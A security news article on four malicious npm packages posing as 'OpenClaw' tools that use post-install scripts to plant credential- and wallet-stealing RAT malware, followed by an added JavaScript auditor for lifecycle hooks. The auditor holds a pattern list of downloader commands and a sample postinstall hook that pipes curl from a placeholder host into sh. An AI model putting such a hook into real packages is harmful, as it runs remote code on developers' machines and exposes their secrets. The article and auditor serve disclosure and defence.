Researchers uncovered four malicious npm packages delivering RAT malware that steals crypto wallets and developer credentials.

Cybersecurity researchers have uncovered four malicious npm packages designed to infect developer systems with remote access trojan (RAT) malware capable of stealing browser data, cryptocurrency wallets, and cloud credentials.
The malicious packages were disguised as tools related to the open-source project “OpenClaw” and distributed through the npm registry as part of an ongoing software supply chain attack targeting developers and DevOps environments. Researchers said the campaign used multi-stage payloads to quietly deploy malware onto compromised systems.
According to findings published in May 2026, the malicious packages downloaded hidden second-stage malware capable of harvesting browser-stored credentials, macOS Keychain data, cryptocurrency wallet information, SSH keys, API tokens, and cloud authentication secrets. The malware also targeted developer-focused platforms and CI/CD infrastructure.
Researchers warned that the malware demonstrated similarities to broader “Shai-Hulud”-style supply chain campaigns previously seen targeting npm and PyPI ecosystems. Those attacks focused heavily on stealing GitHub tokens and developer publishing credentials in order to spread malicious packages further across software repositories.
The discovery comes amid a sharp rise in supply chain attacks targeting open-source ecosystems during 2026. Security firms recently disclosed additional compromises involving widely used npm packages such as Axios, where attackers hijacked maintainer accounts and deployed cross-platform RAT malware affecting Windows, Linux, and macOS systems.
Security researchers said the latest malicious npm packages used post-install scripts and hidden dependency mechanisms to execute malware automatically during installation. In several recent campaigns, attackers also attempted to erase traces of compromise after infecting developer systems.
Experts warned that software supply chain attacks are increasingly targeting developer infrastructure instead of end users directly because compromised developer credentials can provide access to source code repositories, cloud environments, production systems, and downstream software distributions used by millions of users.
Researchers advised developers to immediately remove the malicious packages, rotate all potentially exposed credentials, audit CI/CD pipelines, and review npm dependencies for unauthorized modifications or suspicious post-install behavior.
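The advice above to review dependencies for suspicious post-install behavior can be partly automated. The following is an added example, not code from the article or from any of the researchers cited: it walks a set of package manifests, reports every install-time lifecycle hook (the vector the article describes), and raises the risk when a hook shells out to a downloader or to inline `node -e` code. Package names and manifests below are constructed samples, not the real packages from the campaign.

```javascript
// Added example: audit npm manifests for install-time lifecycle scripts.
// Hooks that npm runs automatically during `npm install`.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Patterns that rarely belong in a legitimate build step: remote fetch piped
// to a shell, inline node/powershell code, or encoded payloads.
const SUSPECT_PATTERNS = [
  /curl\s/i, /wget\s/i, /\|\s*(sh|bash)\b/i,
  /node\s+-e\b/i, /powershell/i, /base64/i, /eval\(/i,
];

// Returns one finding per lifecycle hook present in a manifest.
function auditPackage(name, manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    const matched = SUSPECT_PATTERNS.filter((re) => re.test(cmd)).map(String);
    findings.push({
      name, hook, cmd, matched,
      // Any lifecycle script deserves a look; a downloader pattern is high risk.
      risk: matched.length ? "high" : "review",
    });
  }
  return findings;
}

// Audits a map of { packageName: parsedPackageJson }.
function auditTree(manifests) {
  return Object.entries(manifests).flatMap(([n, m]) => auditPackage(n, m));
}

// Constructed sample manifests (hypothetical names, not real packages).
const SAMPLE_MANIFESTS = {
  "example-plain-lib": { version: "1.0.0" },
  "example-native-addon": { version: "2.1.0", scripts: { install: "node-gyp rebuild" } },
  "example-openclaw-helper": {
    version: "0.0.3",
    scripts: { postinstall: "node -e \"require('child_process').exec('curl -s http://example.invalid/s | sh')\"" },
  },
};

console.log(JSON.stringify(auditTree(SAMPLE_MANIFESTS), null, 2));
```

In practice feed `auditTree` the parsed `package.json` of every directory under `node_modules`; setting `ignore-scripts=true` in `.npmrc` additionally stops lifecycle hooks from running at install time at all, so flagged packages can be inspected before anything executes.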